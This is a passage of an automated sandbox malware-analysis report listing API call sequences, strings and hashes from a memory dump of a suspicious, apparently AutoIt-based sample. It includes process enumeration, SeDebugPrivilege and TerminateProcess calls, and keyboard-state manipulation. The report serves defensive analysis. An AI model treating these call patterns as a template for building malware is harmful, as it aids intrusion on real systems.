                                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0025ACC5
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0025ACD0
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025AD21
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002643C1
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 002643D6
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002643F0
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00264435
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00264462
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00264490
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                                                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0023C6C4
                                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 0023C6E4
                                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0023C71A
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00BA5E90), ref: 0023C76B
                                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(00BA5E90,?,00000001,00000030), ref: 0023C793
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?,?), ref: 001D1B35
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 001D1B99
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 001D1BB6
                                                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001D1BC7
                                                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 001D1C15
                                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00213287
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1C2D: BeginPath.GDI32(00000000), ref: 001D1C4B
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00268740
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00268765
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0026877D
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 002687A6
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0024C1F2,00000000), ref: 002687C6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 002687B1
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0023D1BE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconLoad
                                                                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 002637B7
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 002637BF
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002637CA
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 002637D6
                                                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00263812
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00263823
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00266504,?,?,000000FF,00000000,?,000000FF,?), ref: 0026385E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0026387D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0021194E
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002119D1
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00211B7B,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00211A64
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00211A7B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00203B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001F6A79,?,0000015D,?,?,?,?,001F85B0,000000FF,00000000,?,?), ref: 00203BC5
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00211AF7
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00211B22
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00211B2E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                                            • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00241C1B
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241C43
                                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00241C67
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241C97
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241D1E
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241D83
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241DEF
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 002543C8
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 002544D7
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002544E7
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0025467C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024169E: VariantInit.OLEAUT32(00000000), ref: 002416DE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024169E: VariantCopy.OLEAUT32(?,?), ref: 002416E7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024169E: VariantClear.OLEAUT32(?), ref: 002416F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002308FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?,?,00230C4E), ref: 0023091B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002308FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230936
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002308FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230944
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002308FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?), ref: 00230954
                                                                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002556AE
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002557B6
                                                                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0025582C
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00255837
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                            • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 51d6b6c6d4e4949246ae06e353694937d3113cc5282ea17b06957d14c03f9785
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c380b956a6a30ab1e75969de001a1cffe0dc5be69e252f246d31e06be68be6bf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d6b6c6d4e4949246ae06e353694937d3113cc5282ea17b06957d14c03f9785
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2913571D1062DEFDF10DFA4D890AEEB7B9BF08314F10416AE915A7241EB709A58CFA0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenu.USER32(?), ref: 00262C1F
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00262C51
                                                                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00262C79
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00262CAF
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00262CE9
                                                                                                                                                                                                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00262CF7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002343AD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetCurrentThreadId.KERNEL32 ref: 002343B4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00232F00), ref: 002343BB
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00262D7F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023F292: Sleep.KERNEL32 ref: 0023F30A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c55c55f5d04e3e4da25ac150b7b70b2c9398e4c7aff9e5289044c3a9d0ae6eec
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3523450ce7d931c914a193b71c81ecb45e962fde65c4dddfde7768e85b4dc131
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c55c55f5d04e3e4da25ac150b7b70b2c9398e4c7aff9e5289044c3a9d0ae6eec
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE718B75E10609EFCB10EF64C885AAEB7F5EF48310F118459E816AB351DB74EE918F90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 0023B8C0
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0023B8D5
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0023B936
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0023B964
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0023B983
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0023B9C4
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0023B9E7
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                                            • String ID:
